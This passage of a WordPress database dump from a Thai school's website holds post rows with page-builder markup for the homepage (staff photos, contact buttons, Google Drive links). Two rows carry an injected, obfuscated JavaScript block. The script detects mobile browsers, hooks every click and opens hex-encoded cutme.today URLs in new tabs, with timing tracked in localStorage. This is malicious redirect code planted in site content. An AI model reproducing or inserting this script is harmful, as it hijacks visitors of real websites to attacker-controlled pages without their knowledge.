u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:22:42','2024-09-24 04:22:42','',19,'http://watprato.ssk.in.th/?p=423',0,'revision','',0),
(425,2,'2024-09-24 11:25:44','2024-09-24 04:25:44','{{unknown}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','publish','closed','closed','','e9c671d9e043303041f5666f0beaff01','','','2024-09-24 11:25:44','2024-09-24 04:25:44','',0,'http://watprato.ssk.in.th/?p=425',0,'oembed_cache','',0),
(426,2,'2024-09-24 11:26:31','2024-09-24 04:26:31','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" 